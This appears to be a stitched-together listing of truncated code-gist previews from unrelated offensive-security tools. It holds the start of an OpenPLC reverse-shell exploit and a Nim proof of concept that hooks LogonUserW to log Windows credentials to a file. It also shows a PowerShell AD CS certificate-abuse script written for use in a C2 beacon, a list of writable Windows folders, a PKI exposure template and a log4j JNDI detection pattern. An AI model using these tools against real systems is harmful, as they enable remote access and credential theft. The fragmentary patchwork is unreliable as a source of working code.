| #!/usr/bin/env python3 | |
| import requests | |
| import argparse | |
| from time import sleep | |
| g_openplc_revsh = ''' | |
| #include "ladder.h" | |
| #include <stdio.h> |
| id: exposed-pki-infrastructure | |
| info: | |
| name: Exposed Internal PKI Infrastructure Detection | |
| author: nullenc0de | |
| severity: critical | |
| description: Detects exposed internal PKI infrastructure including CRL distribution points and OCSP responders | |
| tags: pki,exposure,misconfig | |
| requests: | |
| - method: GET |
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
| c:\windows\system32\microsoft\crypto\rsa\machinekeys | |
| c:\windows\system32\tasks_migrated\microsoft\windows\pla\system | |
| c:\windows\syswow64\tasks\microsoft\windows\pla\system | |
| c:\windows\debug\wia | |
| c:\windows\system32\tasks | |
| c:\windows\syswow64\tasks | |
| c:\windows\tasks | |
| c:\windows\registration\crmlog | |
| c:\windows\system32\com\dmp | |
| c:\windows\system32\fxstmp |
| # linux ldapsearch parser for bofhound, useful for environments that have ldap signing/binding and require kerberos auth. | |
| # add support for msDS-KeyCredentialLink | |
| """ | |
| $ ldapsearch -LLL -o ldif-wrap=no -E '!1.2.840.113556.1.4.801=::MAMCAQc=' -H ldap://dc.fake.com -Y GSSAPI -N -b "DC=fake,DC=com" "(&(objectClass=*))" > ldapsearch_out.txt | |
| SASL/GSSAPI authentication started | |
| SASL username: [email protected] | |
| SASL SSF: 256 | |
| SASL data security layer installed. |
| #[ | |
| PoC for hooking advapi32!LogonUserW to log credentials | |
| Patch and restore the function when called, original credit for 99% of the code is here: https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/Hook.nim | |
| Log to a named pipe server (must be started/managed by separate listener), and/or log to a file | |
| by default, just logs to C:\users\public\log.txt | |
| Compile: | |
| nim c -d=mingw --app=lib -d:release --nomain LogonUserSpy.nim |
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log